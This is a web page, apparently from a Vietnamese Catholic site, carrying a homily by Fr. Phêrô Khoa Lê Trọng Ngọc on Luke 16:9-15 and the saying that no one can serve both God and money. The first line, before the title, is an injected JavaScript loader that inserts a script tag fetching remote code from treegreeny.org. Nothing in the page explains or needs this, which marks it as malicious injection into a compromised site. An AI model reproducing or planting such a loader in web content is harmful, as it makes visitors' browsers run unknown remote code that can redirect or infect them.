;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ANH EM KHÔNG THỂ VỪA LÀM TÔI THIÊN CHÚA VỪA LÀM TÔI TIỀN CỦA ĐƯỢC – Xitô PS

ANH EM KHÔNG THỂ VỪA LÀM TÔI THIÊN CHÚA VỪA LÀM TÔI TIỀN CỦA ĐƯỢC

SUY NIỆM THỨ 7 TUẦN XXXI

LC 16, 9-15

  1. Bối cảnh: Hôm nay chúng ta sẽ nghe từ chính môi miệng Đức Giêsu lời giải thích dụ ngôn được đề cập tới hôm qua, đó là dụ ngôn “người quản gia bất lương”. Qua những kiểu diễn tả có chỗ sáng sủa, có chỗ còn mập mờ! Đức Giêsu bày tỏ quan điểm của Ngài về tiền của.

Trong một số những trình thuật Tin Mừng ở chỗ khác, chúng ta thấy Ngài cảnh giác trước của cải vật chất như thể chúng là một cản trở lớn cho đời sống Kitô hữu: “Phúc cho những ai nghèo khó”, “khốn cho các ngươi là những kẻ giàu sang…các người đã được an ủi rồi; những người giàu có, khó vào Nước Thiên Chúa biết bao!” (xLc 6, 20-24; 18, 24).

Ở đây chúng ta gặp lại cùng một quan điểm, nhưng với những hướng dẫn rất tích cực để sử dụng tiền của.

  1. Suy niệm: “Phần Thầy, Thầy bảo cho anh em biết: hãy dùng tiền của bất chính mà tạo lấy bạn bè, phòng khi hết tiền hết bạc, họ sẽ đón rước anh em vào nơi ở vĩnh cửu. Ai trung tín trong việc nhỏ, thì cũng sẽ trung tín trong việc lớn, ai bất lương trong việc nhỏ, thì cũng bất lương trong việc lớn” (Lc 16, 9-10). Ngoài bài học biết dùng của cải vật chất trần gian để mua sắm những thứ bảo đảm cho tương lai Nước Trời, còn có một yếu tố khá quan trọng mà Chúa đã khuyến cáo đó là sự trung tín: “Ai trung tín trong việc nhỏ thì cũng trung tín trong việc lớn” (Lc 16, 10). Hẳn chúng ta đều có kinh nghiệm: thường thường người ta không phạm tội tày trời ngay trong một sớm một chiều, người ta cũng không làm một việc tốt vĩ đại ngay trong một giờ một buổi. Việc lớn là hậu quả hay kết quả của những việc nho nhỏ mà người ta đã bắt đầu làm từ rất lâu trong quá khứ! Như trong dụ ngôn: “Người quản gia” có lẽ khi mới được ông chủ chọn làm người quản lý tài sản của ông chủ, anh ta đã làm rất tốt! Nhưng dần dần, đồng tiền có sẵn trong tay cám dỗ anh ta ăn bớt ăn xén, khởi sự là một số tiền nhỏ, dần dần lớn hơn…rất có thể đôi khi lương tâm anh cũng thức tỉnh, khiến anh biết mình làm sai trái, nhưng đã quen thói biển lận khiến anh ngày càng lún sâu hơn trong tội lỗi! cho đến một ngày nọ, sự việc đã tỏ, ông chủ cho anh ta biết là anh ta bị thải hồi! Đối với Đức Giêsu, tiền của là một việc nhỏ. Còn việc lớn ở đây là sự sống đời đời! Đó là những của cải thần linh, là những sự việc thiêng liêng. Trái lại tiền của chỉ là một việc rất nhỏ, không phải là việc lớn.

Khởi đi từ xác quyết trên, ở đây Đức Giêsu khuyên nhủ hãy trở nên một người điều hành tốt, một người quản lý tốt trong việc bé nhỏ ít quan trọng này, đó là của cải trần thế, để xứng đáng quản lý những việc quan trọng hơn thuộc lãnh vực thiêng liêng. Lời khuyên đầu tiên của Đức Giêsu trên đây là lời mời gọi chúng ta biết quản lý những của cải trần gian của mình một cách đúng đắn.

  • Đối với Đức Giêsu tiền của là vật ngoại lai, của người khác “nếu anh em không trung tín trong việc sử dụng tiền của bất chính, thì ai sẽ tín nhiệm mà giao phó của cải chân thật cho anh em”, vậy nếu anh em không trung tín trong việc sử dụng của cải người khác, thì ai sẽ ban cho anh em của cải dành riêng cho anh em?

Ghi nhận thứ hai của Đức Giêsu: đó là tiền của không phải là của chân thật của con người, làm cho con người trở thành người đích thực. Giá trị đích thực đó là: “Của cải các người hãy bán đi mà bố thí”! hãy sắm cho mình những ví tiền sẽ không hề bị cũ nát, kho tàng không bao giờ vơi trên trời” (Lc 12, 31). Đức Giêsu không rút ra một kết án triệt để từ xác quyết trên, trái lại Ngài nói với chúng ta “việc quản lý của cải của người khác (của cải ngoại lai) này đối với con người có thể là một thực tập tốt để có khả năng quản lý của cải chân thật của chúng ta.

  • Đối với Đức Giêsu, tiền của thường gian dối, giả trá, đành rằng tiền của là vật khó kiếm và hữu ích, là kết quả của lao động…nhưng nó cũng thường là kết quả do áp bức và biển lận…Tục ngữ có câu: “Túi tham không đáy”. Nên chúng ta cần cảnh giác, đừng tự dối mình: “chỉ một ít này thôi, chỉ một lần này thôi”! Rồi lần lần cứ lún sâu thêm trong đam mê tội lỗi mà ta đâu có ngờ đến thế, khiến ta nên kẻ nô lệ tiền tài, và kể nó như chúa tể đến nỗi Chúa phải khuyến cáo mạnh mẽ: “Anh em không thể vừa làm tôi Thiên Chúa vừa làm tôi tiền của được” (Lc 16, 13).
  • Đối với Đức Giêsu, tiền của có thể “phục vụ” và như thể trở nên một biểu tượng của tình yêu.

Thật ra đây là mới là ý nghĩa sâu sắc của dụ ngôn “người quản gia bất lương mà chúng ta vừa cùng nhau suy niệm bổn phận xét và hướng dẫn tích cực để sử dụng tiền của mà Đức Giêsu vừa nêu trên.

Nếu người ta căn cứ vào cách dùng tiền của để biết được lòng người có trung tín hay không, thì tại sao chúng ta lại không trung tín trong việc rất nhỏ là sử dụng tiền của như là phương tiện để phục vụ cho cùng đích là Nước Trời. Khi đó chúng ta mới thực sự làm tôi Thiên Chúa. Lạy Chúa Giêsu, xin Chúa dạy chúng con: Anh em không thể làm tôi Thiên Chúa vừa làm tôi tiền của được”. Xin cho chúng con luôn quyết tâm chỉ phụng sự một mình Chúa và chỉ sử dụng của cải như là phương tiện để phục vụ.

 

LM PHÊRÔ KHOA- LÊ TRỌNG NGỌC

You May Also Like

Trả lời

X